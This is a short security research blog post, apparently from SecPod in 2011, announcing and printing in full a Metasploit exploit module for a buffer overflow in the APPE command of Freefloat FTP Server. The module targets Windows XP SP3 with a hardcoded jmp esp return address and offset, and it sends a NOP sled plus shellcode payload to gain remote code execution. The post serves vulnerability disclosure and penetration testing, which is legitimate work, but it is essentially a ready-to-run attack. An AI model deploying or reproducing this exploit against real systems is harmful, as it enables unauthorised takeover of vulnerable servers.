Learn Search

Search across all Learn content

← Back to Security Research

Metasploit Module – Freefloat FTP Server APPE Command Overflow

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Sep 6, 2011By Veerendra GG2 min read

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit :

plaintext

##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Freefloat FTP Server APPE Command Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow vulnerability
                    found in the APPE command in the Freefloat FTP server.
            },
            'Author'         =>
                [
                    'veerendragg @ SecPod', # Initial Discovery
                    'veerendragg @ SecPod'  # Metasploit Module
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1.0 $',
            'References'     =>
                [
                    [ 'URL', 'https://www.secpod.com/blog/?p=310' ],
                    [ 'URL', 'https://www.secpod.com/blog/?p=353' ],
                    [ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
                    [ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space' => 500,
                    'BadChars' => "\x00\x0a\x0d",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP3 EN',
                        {
                            'Ret' => 0x7e429353, # jmp esp from user32.dll
                            'Offset' => 246
                        }
                    ],
                ],
            'DisclosureDate' => 'Aug 07 2011',
            'DefaultTarget' => 0))
    end

    def exploit
        connect_login
        print_status("Trying target #{target.name}...")
        buf = make_nops(target['Offset'])
        buf << [target.ret].pack('V')
        buf << make_nops(30)
        buf << payload.encoded

        print_status("Sending exploit buffer...")
        send_cmd( ['APPE', buf] , false )

        handler
        disconnect
    end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

Metasploit Module – Freefloat FTP Server APPE Command Overflow | SecPod